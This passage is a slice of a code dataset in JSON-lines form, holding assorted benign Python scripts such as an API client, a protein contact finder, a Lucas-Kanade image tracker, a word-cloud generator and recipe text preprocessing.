phrase_id})\n","sub_path":"repositories/phrase_repository.py","file_name":"phrase_repository.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"422064968","text":"from datetime import datetime, timedelta\nimport requests\nimport logging\nimport json\nimport base64\n\nclass MaxposterApi:\n\tdef __init__(self, config, project_key, zone = '+03:00'):\n\t\tself.config = config\n\t\tself.project_key = project_key\n\t\tself.zone_str = zone\n\t\tself.__url = 'https://api.maxposter.ru/partners-api'\n\t\tself.__token = base64.b64encode(bytes('{0!s}:{1!s}'.format(self.config['login'], self.config['token']),'utf-8')).decode()\n\t\tself.__request_headers = {\n\t\t\t'Content-Type': 'application/json; charset=utf-8',\n\t\t\t'Authorization': 'Basic {0!s}'.format(self.__token)\n\t\t}\n\t\tself.testAuth()\n\tdef testAuth(self, simulate = True):\n\t\tif not simulate:\n\t\t\trequest = requests.get(\n\t\t\t\t'{0!s}/directories/call-sources.json'.format(self.__url),\n\t\t\t\tdata = json.dumps({ 'limit': 10, 'offset': 0, 'orders': ['-id']}, ensure_ascii=False),\n\t\t\t\theaders = self.__request_headers\n\t\t\t)\n\t\t\ttry:\n\t\t\t\tresponse = json.loads(request.text)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error('MP: PARSE: ERROR: {1!s} :{0!s}'.format(str(e), request.text))\n\t\t\t\traise Exception('Auth Failed')\n\t\t\tif request.status_code != 200 or response.get('status', '') == 'error':\n\t\t\t\tself.auth_status = 403\n\t\t\t\tlogging.error('MP : AUTH : ERROR :{0!s}'.format(response.get('message')))\n\t\t\t\traise Exception('Auth Failed')\n\t\tself.auth_status = 200\n\t\treturn True\n\tdef endSession(self):\n\t\treturn True\n\tdef getAuthStatus(self):\n\t\treturn self.auth_status\n\tdef captureStats(self, start_date, end_date=None):\n\t\tif type(start_date) != datetime:\n\t\t\tstart_date = datetime.strptime(start_date, '%Y-%m-%d %H:%M:%S')\n\t\tif end_date is None:\n\t\t\tend_date = datetime.now()\n\t\telse:\n\t\t\tif type(end_date) != datetime:\n\t\t\t\tend_date = datetime.strptime(end_date, '%Y-%m-%d %H:%M:%S')\n\t\tresult = []\n\t\tlimit = 100\n\t\tresults_len = 1\n\t\toffset = 0\n\t\twhile offset < results_len:\n\t\t\tbody = {\n\t\t\t\t'limit': limit,\n\t\t\t\t'offset': offset,\n\t\t\t\t'orders': ['-sessionStartedAt'],\n\t\t\t\t'filters': [{\n\t\t\t\t\t'fields': 'sessionStartedAt',\n\t\t\t\t\t'type': 'between',\n\t\t\t\t\t'value': [start_date.strftime('%Y-%m-%dT%H:%M:%S') + self.zone_str, end_date.strftime('%Y-%m-%dT%H:%M:%S') + self.zone_str]\n\t\t\t\t}]\n\t\t\t}\n\t\t\trequest = requests.post('{0!s}/calls'.format(self.__url), json.dumps(body, ensure_ascii=False), headers = self.__request_headers)\n\t\t\ttry:\n\t\t\t\tresponse = json.loads(request.text)\n\t\t\texcept Exception as e:\n\t\t\t\tlogging.error('MP: PARSE: ERROR: {1!s} : {0!s}'.format(str(e), request.text))\n\t\t\t\traise Exception('Bad format')\n\t\t\tif request.status_code != 200 or response.get('status', '') == 'error':\n\t\t\t\tlogging.error('MP : AUTH : ERROR : {0!s}'.format(response.get('message')))\n\t\t\t\traise Exception('Query Failed')\n\t\t\tcalls = response.get('data', {}).get('calls', [])\n\t\t\tresult += calls\n\t\t\toffset = (offset + len(calls)) if len(calls) > 0 else 1\n\t\t\tresults_len = int(response.get('data', {}).get('meta', {}).get('range', {}).get('total', '0'))\n\t\treturn result\n\n","sub_path":"systems/maxposter.py","file_name":"maxposter.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"535760882","text":"#!/usr/bin/env python\n\n__author__ = \"Tomasz Kosciolek\"\n__version__ = \"1.01b\"\n__last_update__ = \"07/04/2016\"\n\nimport numpy as np\nfrom optparse import OptionParser\nfrom contacts import calc_distance, get_PDB_coordinates\n\n\ndef find_contacts(out_fh, coords, seq_sep, contact_coff):\n # calc distances\n for i in range(len(coords)):\n actual = coords[i][0]\n for j in coords[i:]:\n if j[0] >= actual + int(seq_sep):\n distance = calc_distance(coords[i][1], j[1],\n coords[i][2], j[2],\n coords[i][3], j[3])\n if distance <= float(contact_coff):\n out_fh.write('%s\\t%s\\t%s\\n' % (str(actual),\n str(j[0]), str(distance)))\n actual = []\n out_fh.close()\n\n\ndef main():\n parser = OptionParser(usage=\"usage: %prog [OPTIONS] [pdb] [output]\")\n parser.add_option(\"-a\", dest='aminoacid', default='CB',\n help=\"CA, CB etc. (Default: CB)\")\n parser.add_option(\"-c\", dest='cutoff', default='8',\n help=\"Cutoff (Default: 8)\")\n parser.add_option(\"-d\", dest='seq_separation', default='5',\n help=\"Minimum sequence separation (Default: 5)\")\n (options, args) = parser.parse_args()\n\n if len(args) != 2:\n parser.error(\"Incorrect number of arguments!... -h for help\")\n\n finp = open(args[0], 'r')\n foutput = open(args[1], 'w')\n\n # extract coords\n coords = get_PDB_coordinates(finp, options.aminoacid)\n\n find_contacts(foutput, coords, options.seq_separation, options.cutoff)\n\n print(\"Done.\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"microprot/scripts/find_contacts.py","file_name":"find_contacts.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"405948830","text":"#!/usr/bin/python3\n\n\n\ndef droga(pole1, pole2):\n if abs(pole1[0]-pole2[0]) > abs(pole1[1]-pole2[1]):\n return abs(pole1[0]-pole2[0])\n\n else:\n return abs(pole1[1]-pole2[1])\n\n\ndef main():\n c = input().split()\n n = int(c[0])\n m = int(c[1])\n \n pola = [0] * (n*m+1)\n\n for i in range(n):\n x = input().split()\n for j in range(m):\n numerPola = int(x[j])\n\n pola[numerPola] = (i, j)\n\n nrPola = 1\n tuptup = 0\n\n while nrPola < n * m:\n tuptup += droga(pola[nrPola] , pola[nrPola + 1])\n nrPola += 1\n \n print(tuptup)\n \n \n\n\nmain() ","sub_path":"2020/05/21/krol.py","file_name":"krol.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"633944750","text":"#print (\"test commit\")\n#sudo pip install requests\nimport requests\nimport urllib.parse \nmain_api='https://opendata.arcgis.com/datasets/3df29a3d088a42d890f11d027ea1c0be_0.geojson'\njson_data =requests.get(main_api).json()\n\n#x=json_data.get(\"features\")\n#y =x[0]\n#x for i in range(902):\n#a =\" \".join(str(l) for l in x)\n#po = a.get(\"properties\")\n#e = po.get(\"PARK_NAME\")\n#print(e)\n\n#fid=[]\n#cleanlist=[]\n#for i in range(902):\n #my_result = json_data['features'][i]['properties']['PARK_NAME']\n #my_result2=json_data.get['feature'] \n #fid.append(my_result,my_result2)\n#[cleanlist.append(x) for x in fid if x is not in cleanlist]\n #for i in fid:\n #print(i) \n #print(type(a))\n #str1 = ''.join(a)\n #print(my_result)\nfid=[] #empty list\ncleanlist=[]\nfor i in range(902):\n my_result = json_data['features'][i]['properties']['PARK_NAME'] #display park names in halifax\n my_result2 = json_data['features'][i]['properties']['HECTARES'] #display the area of park\n fid.append(my_result)\n fid.append(my_result2)\n #removing duplicates in the list\n [cleanlist.append(x) for x in fid if x not in cleanlist]\n\n#second_api='https://maps.google.com/maps/api/geocode/json?'\n#for parks in cleanlist:\n\n #url2=second_api+urllib.parse.urlencode({'address':parks})\n\n#json_data=requests.get(url2).json()\n #formatted_address=json_data['results'][0]['geometry']['location']\n #print(parks)\n #for k,v in formatted_address.items():\n #print(k,v)\nsecond_api='https://maps.google.com/maps/api/geocode/json?'\nfor parks in cleanlist: #unique park names print in new list\n url2=second_api+urllib.parse.urlencode({'address':parks})\n json_data=requests.get(url2).json()\n try:\n formatted_address=json_data['results'][0]['geometry']['location'] #location of the park is displayed\n print(parks)\n for k,v in formatted_address.items():\n print(k,v)\n except:\n pass\n\n","sub_path":"mp.py","file_name":"mp.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"526996676","text":"# -*- coding: utf-8 -*-\n\"\"\"\nModified on Sun Sep 9 15:31:15 2018\n@author: Jing\n@Email: cdxujing@qq.com\nTitle: Leetcode\n\"\"\"\n\n\"\"\"\nGiven a paragraph and a list of banned words, return the most frequent word that is not in the list of banned words. It is guaranteed there is at least one word that isn't banned, and that the answer is unique.\n\nWords in the list of banned words are given in lowercase, and free of punctuation. Words in the paragraph are not case sensitive. The answer is in lowercase.\n\nExample:\nInput:\nparagraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\nbanned = [\"hit\"]\nOutput: \"ball\"\nExplanation:\n\"hit\" occurs 3 times, but it is a banned word.\n\"ball\" occurs twice (and no other word does), so it is the most frequent non-banned word in the paragraph.\nNote that words in the paragraph are not case sensitive,\nthat punctuation is ignored (even if adjacent to words, such as \"ball,\"),\nand that \"hit\" isn't the answer even though it occurs more because it is banned.\n\"\"\"\n\n\nimport re\n\nparagraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\nbanned = [\"hit\"]\nwords = [x.lower() for x in re.split(\"[!?',;. ]\", paragraph) if ((x != '') and (x not in banned))]\nidx = 0\nMax = 0\nfor i in range(len(words)):\n _max = words.count(words[i])\n if _max > Max:\n Max = _max\n idx = i\nprint(words[idx])","sub_path":"leet_code-most_frequence_word.py","file_name":"leet_code-most_frequence_word.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"546452820","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom sort_utils import swap\n\n\ndef sort(array):\n \"\"\"\n Bubble sort\n Complexity\n Memory\n O(n) - use same array and swap \"in place\"\n Time\n Worst: O(n^2) - when array is reversed\n ((n - 1) + (n - 2) + ... + (n - n))/2 ~ O(n^2)\n Average: O(n^2)\n Best: ϴ(n) - when array is sorted\n \"\"\"\n is_sorted = False\n while not is_sorted:\n is_sorted = True\n for i in range(len(array) - 1):\n if array[i] > array[i + 1]:\n is_sorted = False\n swap(array, i, i + 1)\n","sub_path":"homework2/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"213609251","text":"import pandas as pd\nimport numpy as np\nimport nltk\nimport jieba\nfrom wordcloud import WordCloud,STOPWORDS,ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport chardet\nimport seaborn as sns\nimport os\nsns.set_style(\"whitegrid\",{\"font.sans-serif\":['KaiTi', 'Arial']})\npath3 = os.path.join(os.getcwd(),\"dealworld/stopwords.txt\")\nstopwords = {}.fromkeys([line.rstrip() for line in open(path3,'r') ])\n\n\ndef concat_seg(line):\n\tworldlist = jieba.cut(line.strip())\n\toutstr = ''\n\tfor world in worldlist:\n\t\tif(world not in stopwords):\n\t\t\tif(len(world) > 1):\n\t\t\t\tif(world != '\\t'):\n\t\t\t\t\toutstr +=world\n\t\t\t\t\toutstr +=\"/\"\n\treturn outstr\n\n\ndef deal_Field(Field):\n\tpath1 = os.path.join(os.getcwd(),\"dealworld/industryField.txt\")\n\tpath2 = os.path.join(os.getcwd(),\"dealworld/industryField_plus.txt\")\n\tif(os.path.exists(path1)):\n\t\tos.remove(path1)\n\tif(os.path.exists(path2)):\n\t\tos.remove(path2)\n\twith open(path1,'w') as f:\n\t\tfor i in range(len(Field)):\n\t\t\tf.write(Field[i])\n\t\t\tf.write(\"\\n\")\n\tinfile = open(path1,'r')\n\toutfile = open(path2,'w')\n\tfor line in infile:\n\t\tline_seg = concat_seg(line)\n\t\toutfile.write(line_seg)\n\tinfile.close()\n\toutfile.close()\n\n\ndef deal_Name(Name):\n\tpath1 = os.path.join(os.getcwd(),\"dealworld/positionName.txt\")\n\tpath2 = os.path.join(os.getcwd(),\"dealworld/positionName_plus.txt\")\n\tif(os.path.exists(path1)):\n\t\tos.remove(path1)\n\tif(os.path.exists(path2)):\n\t\tos.remove(path2)\n\twith open(path1,'w') as f:\n\t\tfor i in range(len(Name)):\n\t\t\t# print(Name[i])\n\t\t\tf.write(Name[i].replace('\\uf0d8',''))\n\t\t\tf.write(\"\\n\")\n\tinfile = open(path1,'r')\n\toutfile = open(path2,'w')\n\tfor line in infile:\n\t\tline_seg = concat_seg(line)\n\t\toutfile.write(line_seg)\n\tinfile.close()\n\toutfile.close()\n\ndef wordcloud_Field():\n\tpath1 = os.path.join(os.getcwd(),\"dealworld/industryField_plus.txt\")\n\tf = open(path1,'r').read()\n\tfont = r\"C:\\Windows\\Fonts\\STZHONGS.TTF\"\n\t# alice_coloring = np.array(plt.imread('xxxxx.jpg'))\n\n\twc = WordCloud(\n\t\tbackground_color='white',\n\t\tfont_path=font,\n\t\tmax_words=200,\n\t\tstopwords=STOPWORDS,\n\t\tmax_font_size=250,\n\t\trandom_state=30,\n\t\theight=860,\n\t\tmargin=2,\n\t\twidth=1000,\n\t\tcollocations=False,\n\t\t# mask=alice_coloring\n\t\t)\n\twc.generate_from_text(f)\n\t# img_colors = ImageColorGenerator(background_Image)\n\t# wc.recolor(color_func=img_colors)\n\tplt.imshow(wc)\n\tplt.axis(\"off\")\n\tplt.show()\n\ndef wordcloud_Name():\n\tpath1 = os.path.join(os.getcwd(),\"dealworld/positionName_plus.txt\")\n\tf = open(path1,'r').read()\n\tfont = r\"C:\\Windows\\Fonts\\STZHONGS.TTF\"\n\t# alice_coloring = np.array(plt.imread('xxxxx.jpg'))\t#使用自定义图片时取消这些注释\n\n\twc = WordCloud(\n\t\tbackground_color='white',\n\t\tfont_path=font,\n\t\tmax_words=200,\n\t\tstopwords=STOPWORDS,\n\t\tmax_font_size=250,\n\t\trandom_state=30,\n\t\theight=860,\n\t\tmargin=2,\n\t\twidth=1000,\n\t\tcollocations=False,\n\t\t# mask=alice_coloring\n\t\t)\n\twc.generate_from_text(f)\n\t# img_colors = ImageColorGenerator(background_Image)\n\t# wc.recolor(color_func=img_colors)\n\tplt.imshow(wc)\n\tplt.axis(\"off\")\n\tplt.show()\n\ndef text_process(data):\n\tindustryField_text = data['industryField'].values\n\tpositionName_text = data['positionName'].values\n\t# deal_Field(industryField_text)\n\t# deal_Name(positionName_text)\n\twordcloud_Field()\n\twordcloud_Name()","sub_path":"Analysis/dealwords.py","file_name":"dealwords.py","file_ext":"py","file_size_in_byte":3185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124657713","text":"s = \"ABCDCDCD\"\nf = \"CD\"\n\n\"\"\"\nl= list(s.split())\n\nprint(l)\n\nprint(len([i for i in l if i == f]))\n\"\"\"\ncount=0\n\nfor i in range(len(s)):\n\tif s[i:i+len(f)] == f:\n\t\tcount+=1\n\n\nprint(count)\t\t\n\t\n\t\n\"\"\"best code\nstring, substring = (input().strip(), input().strip())\nprint(sum([ 1 for i in range(len(string)-len(substring)+1) if string[i:i+len(substring)] == substring]))\n\"\"\"\n\n\"\"\" another way\nlen([i for i in range(len(s)) if s[i:i+len(b)] == b])\n\"\"\"","sub_path":"18-find-a-string.py","file_name":"18-find-a-string.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"446916487","text":"'''\n * BSD 3-Clause License\n * @copyright (c) 2019, Krishna Bhatu, Hrishikesh Tawade, Kapil Rawal\n * All rights reserved.\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions are met:\n *\n * Redistributions of source code must retain the above copyright notice, this\n * list of conditions and the following disclaimer.\n * Redistributions in binary form must reproduce the above copyright notice,\n * this list of conditions and the following disclaimer in the documentation\n * and/or other materials provided with the distribution.\n * Neither the name of the copyright holder nor the names of its\n * contributors may be used to endorse or promote products derived from\n * this software without specific prior written permission.\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n * @file human.py\n * @author Krishna Bhatu, Hrishikesh Tawade, Kapil Rawal\n * @version 1.0\n * @brief Implemetation of Lucas-Kanade algorithm on human dataset \n *\n '''\n\nimport cv2\nimport numpy as np\nimport math\nimport glob\nimport os\n\n# Robust Error Weights\ndef getRobustError(errorVector):\n var = np.var(errorVector)\n sd = np.sqrt(var)\n mean = np.mean(errorVector)\n n,it = errorVector.shape\n q = np.zeros((n,it))\n in1,in2 = np.where(np.abs(mean - errorVector) <= var)\n q[in1,in2] = 0.5\n in3,in4 = np.where(np.abs(mean - errorVector) > var)\n q[in3,in4] = 0.05\n return q\n\n# Warp function for affine\ndef getWfromP(p):\n W = np.array([[1+p[0,0],p[0,2],p[0,4]],\n [p[0,1], 1+p[0,3],p[0,5]]])\n return W \n\n# Wrapping the image\ndef wrappingFunction(I,W,Tpoints):\n n,it = Tpoints.shape\n transformedImagePoints = np.empty([2,n])\n transformedImagePoints = np.matmul(W,Tpoints.T)\n transformedImagePoints = transformedImagePoints.T\n transformedImageIntensities = np.empty([n,1])\n transformedImageIntensities[:,0] = I[transformedImagePoints[:,1].astype(int),transformedImagePoints[:,0].astype(int)]\n \n return transformedImagePoints,transformedImageIntensities\n\n# Wrapping the gradient image\ndef wrappingFunctionOfGrad(gradientX, gradientY ,IWpoints):\n n,it = IWpoints.shape\n gradXIntensities = np.empty([n,1])\n gradYIntensities = np.empty([n,1])\n gradXIntensities[:,0] = gradientX[IWpoints[:,1].astype(int),IWpoints[:,0].astype(int)]\n gradYIntensities[:,0] = gradientY[IWpoints[:,1].astype(int),IWpoints[:,0].astype(int)]\n return gradXIntensities, gradYIntensities\n\n# Calculating change in parameters p\ndef clacChangeInParams(error, IWdx, IWdy, TPoints, weights):\n img1 = IWdx[:,0] * [TPoints[:,0]]\n img2 = IWdx[:,0] * [TPoints[:,1]]\n img3 = IWdy[:,0] * [TPoints[:,0]]\n img4 = IWdy[:,0] * [TPoints[:,1]]\n dIW = np.hstack((img1.T,img3.T,img2.T,img4.T,IWdx,IWdy))\n sumP = np.matmul(dIW.T,error * weights)\n sumHess = np.matmul(dIW.T,weights * dIW)\n sumP = np.matmul(np.linalg.pinv(sumHess), sumP)\n return sumP\n\n# LucasKanadeTracker implementation\ndef lucasKanadeTracker(Tpoints, Tintensity, I, p, startingPoint, endPoint):\n threshold = 0.07\n changeP = 100\n gradientX = cv2.Sobel(I,cv2.CV_64F,1,0,ksize=3)\n gradientY = cv2.Sobel(I,cv2.CV_64F,0,1,ksize=3)\n it = 0\n safeW,safep = getWfromP(p),p \n while(changeP > threshold):\n it += 1\n W = getWfromP(p)\n IWpoints, IWi = wrappingFunction(I,W,Tpoints)\n error = Tintensity - IWi\n weights = getRobustError(error)\n IWdx, IWdy = wrappingFunctionOfGrad(gradientX, gradientY ,IWpoints)\n deltaP= clacChangeInParams(error, IWdx, IWdy,Tpoints, weights)\n changeP = np.linalg.norm(deltaP)\n p[0,0] += deltaP[0,0]\n p[0,1] += deltaP[1,0]\n p[0,2] += deltaP[2,0]\n p[0,3] += deltaP[3,0]\n p[0,4] += deltaP[4,0] \n p[0,5] += deltaP[5,0]\n newStart = np.array([[startingPoint[0]],[startingPoint[1]],[1]])\n newend = np.array([[endPoint[0]],[endPoint[1]],[1]])\n s = np.matmul(W,newStart)\n e = np.matmul(W,newend)\n if (it > 300):\n return safeW,safep \n return W,p\n\n# Selecting template from the image\ndef selectRectangle(event, x, y, flags, param):\n global startingPoint, endPoint\n if event == cv2.EVENT_LBUTTONDOWN:\n startingPoint = [x,y]\n elif event == cv2.EVENT_LBUTTONUP:\n endPoint = [x,y]\n cv2.rectangle(frame11, (startingPoint[0], startingPoint[1]), (endPoint[0], endPoint[1]), (255,255,255), 2)\n cv2.imshow(\"Mark\", frame11)\n cv2.waitKey(0)\n\nglobal startingPoint, endPoint\n\n# Taking input images\nimgs = glob.glob('human/*.jpg')\n\n# Setting output folder\nfolder = 'weightedOutput'\n\n# Creating folder directory if one doesn't exits\nif not os.path.exists(folder):\n os.makedirs(folder)\n\n# Taking user input\ninp = input(\"Do you want to select the bounding box for template or use the tested bounding box for best result?('y' for Yes and 'n' for no) :\")\nif(inp == \"y\"):\n frame11 = cv2.imread(imgs[0], cv2.IMREAD_UNCHANGED)\n cv2.namedWindow(\"Mark\")\n cv2.setMouseCallback(\"Mark\", selectRectangle)\n cv2.imshow(\"Mark\", frame11)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\nelse:\n startingPoint = [263,291]\n endPoint = [282,359]\n\n# Converting to gray\nframe1 = cv2.imread(imgs[0], 0)\n\nh1 = abs(startingPoint[1] - endPoint[1])\nw1 = abs(startingPoint[0] - endPoint[0])\nframe1Points = np.empty([h1*w1,3])\nn = 0\n\n# Getting frames points\nfor i in range(startingPoint[0],endPoint[0]):\n for j in range(startingPoint[1],endPoint[1]):\n frame1Points[n,0] = i\n frame1Points[n,1] = j\n frame1Points[n,2] = 1\n n+=1\n\nframe1Intensities = np.empty([h1*w1, 1])\nn = 0\n# Setting new points with intensity from image\nfor i in frame1Points:\n frame1Intensities[n,0] = frame1[int(i[1]),int(i[0])]\n n += 1\n\np = np.zeros([1,6], dtype = np.float)\nframesSeen = 0\nit = 0\n\n# Main loop for all image sequence\nfor img in imgs: \n\n frame1c = cv2.imread(img)\n frame2 = cv2.imread(img, 0)\n frame2 = frame2.astype(float)\n\n # LucasKanadeTracker\n updatedParam,p = lucasKanadeTracker(frame1Points, frame1Intensities, frame2, p, startingPoint, endPoint)\n \n # Updating boundary points\n newstartPoint = np.array([[startingPoint[0]],[startingPoint[1]], [1]])\n newendPoint = np.array([[endPoint[0]],[endPoint[1]], [1]])\n newStart = np.matmul(updatedParam, newstartPoint)\n newEnd = np.matmul(updatedParam, newendPoint)\n newstartrigth = np.array([[startingPoint[0]],[endPoint[1]], [1]])\n newstartleft = np.array([[endPoint[0]],[startingPoint[1]], [1]])\n newStartrigth = np.matmul(updatedParam, newstartrigth)\n newStartleft = np.matmul(updatedParam, newstartleft)\n print(it)\n framesSeen += 1\n if(framesSeen == 1000):\n p = np.zeros([1,6], dtype = np.float)\n startingPoint[0], startingPoint[1] = int(newStart[0]), int (newStart[1])\n endPoint[0], endPoint[1] = int(newEnd[0]), int(newEnd[1])\n h1 = abs(startingPoint[1] - endPoint[1])\n w1 = abs(startingPoint[0] - endPoint[0])\n frame1Points = np.empty([h1*w1,3])\n n = 0\n for i in range(startingPoint[0],endPoint[0]):\n for j in range(startingPoint[1],endPoint[1]):\n frame1Points[n,0] = i\n frame1Points[n,1] = j\n frame1Points[n,2] = 1\n n+=1\n\n frame1Intensities = np.empty([h1*w1, 1])\n n = 0\n for i in frame1Points:\n frame1Intensities[n,0] = frame1[int(i[1]),int(i[0])]\n n += 1\n framesSeen = 0\n\n # Creating bounding box\n cv2.line(frame1c, (newStart[0],newStart[1]), (newStartrigth[0], newStartrigth[1]), (0,0,255),2)\n cv2.line(frame1c, (newStart[0],newStart[1]), (newStartleft[0], newStartleft[1]), (0,0,255),2)\n cv2.line(frame1c, (newStartleft[0], newStartleft[1]), (newEnd[0], newEnd[1]), (0,0,255),2)\n cv2.line(frame1c, (newStartrigth[0], newStartrigth[1]), (newEnd[0], newEnd[1]), (0,0,255),2)\n \n cv2.imshow(\"Frameaa\", frame1c)\n cv2.waitKey(1)\n\n # Writing the image\n cv2.imwrite(folder + '/' + img, frame1c)\n it += 1\n\nprint('All frames processed')\nprint('\\nPress \\'q\\' to destroy window')\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"src/weightedHuman.py","file_name":"weightedHuman.py","file_ext":"py","file_size_in_byte":8991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"181572378","text":"import unittest\n\nhumidity_values = [-300, 30, 50, 100]\n\n\nclass Measure_Humidity(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_noclamp(self):\n from senseo.exception import MaxLimitException, MinLimitException\n from senseo.measure.humidity import Humidity\n for value in humidity_values:\n def newHumidity(v):\n return Humidity(v, clamp=False)\n print('Humidity.min: %s' % Humidity.min)\n print('Humidity.max: %s' % Humidity.max)\n print('Value: %s' % value)\n if value < Humidity.min:\n self.assertRaises(MinLimitException, newHumidity, (value))\n elif value > Humidity.max:\n self.assertRaises(MaxLimitException, newHumidity, (value))\n else:\n h = newHumidity(value)\n self.assertEqual(value, h.value())\n\n def test_clamp(self):\n from senseo.measure.humidity import Humidity\n for value in humidity_values:\n def newHumidity(v):\n return Humidity(v)\n print('Humidity.min: %s' % Humidity.min)\n print('Humidity.max: %s' % Humidity.max)\n h = newHumidity(value)\n print('Value in: %s out: %s' % (value, h.value()))\n if value < h.min:\n self.assertEqual(h.value(), h.min)\n elif value > h.max:\n self.assertEqual(h.value(), h.max)\n else:\n h = newHumidity(value)\n self.assertEqual(value, h.value())\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"senseo/test/measure_humidity.py","file_name":"measure_humidity.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"512353178","text":"import pandas as pd\nimport re\nimport collections\nfrom nltk.tokenize import RegexpTokenizer\nimport spacy\n\n\ndef load_data(filename):\n recipes_df = pd.read_csv(filename, header=None, usecols=[\n 0, 1, 2, 5], names=['id', 'name', 'ingredients', 'category_id'])\n\n def replace(x):\n res = x.copy()\n if x.isna()['ingredients']:\n res['ingredients'] = x['name']\n return res\n\n recipes_df = recipes_df.apply(replace, axis=1)\n return recipes_df\n\n\ndef build_corpus(recipes_df):\n corpus = {}\n for recipe in enumerate(recipes_df.itertuples()):\n corpus[recipe[1].id] = []\n ingredients = recipe[1].ingredients.split(',')\n for ingredient in ingredients:\n numbers_list = re.findall(r'[0-9]+', ingredient)\n numbers_list += ['-', '/', ',', '(', ')', \"'\"]\n for nbr in numbers_list:\n ingredient = ingredient.replace(nbr, ' ')\n ingredient = ingredient.strip()\n corpus[recipe[1].id] += ingredient.split(' ')\n return corpus\n\n\ndef recipe_tokenize(recipe):\n if type(recipe) != str:\n raise Exception(\"The function takes a string as input data\")\n else:\n tokenizer = RegexpTokenizer(r'(\\w+)')\n tokens = tokenizer.tokenize(recipe)\n filt_tokens = []\n for token in tokens:\n if not re.match(r'.*\\d+.*', token):\n filt_tokens.append(token)\n return filt_tokens\n\n\ndef build_collection_from_df(recipes_df):\n corpus = {}\n for recipe in enumerate(recipes_df.itertuples()):\n corpus[recipe[1].id] = recipe_tokenize(recipe[1].ingredients)\n return corpus\n\n\ndef count_frequency(collection):\n tokens_count = collections.Counter()\n for key in collection.keys():\n count = collections.Counter(collection[key])\n tokens_count.update(count)\n return tokens_count\n\n\ndef n_most_common_tokens(collection, n):\n tokens_count = count_frequency(collection)\n n_most_common_tokens = tokens_count.most_common(n)\n return n_most_common_tokens\n\n\nSTOP_WORDS = ['DE', 'G', 'AUX', 'À', 'CUIL',\n 'SOUPE', 'D', 'CL', 'OU', 'DU',\n 'MON', 'AU', 'DES', 'LE', 'LES',\n 'LA', 'EN', 'KG', 'POUR', 'ET', 'LIVRE', 'L', 'RECETTE']\n\n# Fonction permettant de filtrer la collection des mots vides\n\n\ndef remove_stop_words(collection, stop_word_file):\n collection_filtered = {}\n for i in collection:\n collection_filtered[i] = []\n for j in collection[i]:\n if j not in stop_word_file:\n collection_filtered[i].append(j)\n return collection_filtered\n\n\ndef collection_lemmatize(collection):\n collection_lemmatized = {}\n nlp = spacy.load('fr_core_news_md')\n for i in collection:\n collection_lemmatized[i] = []\n for j in collection[i]:\n ingredients = nlp(j)\n for token in ingredients:\n collection_lemmatized[i].append(token.lemma_.upper())\n return collection_lemmatized\n\n\ndef pre_process_collection(collection):\n lemmatized_collection = collection_lemmatize(collection)\n return remove_stop_words(lemmatized_collection)\n\n\ndef get_pre_processed_collection(filename):\n recipes_df = load_data(filename)\n collection = build_collection_from_df(recipes_df)\n return pre_process_collection(collection)\n\n\ndef get_term_weigth(document_id, term, recipes_df):\n step_list = recipes_df[recipes_df.id == document_id]['ingredients'].reset_index()[\n 'ingredients'][0]\n step_list = step_list.split(',')\n for pos, ingredients in enumerate(step_list):\n if re.findall(term, ingredients.upper()):\n return weigth_function(pos)\n return 0\n\n\ndef weigth_function(pos, ratio=1.2, first_val=1):\n return 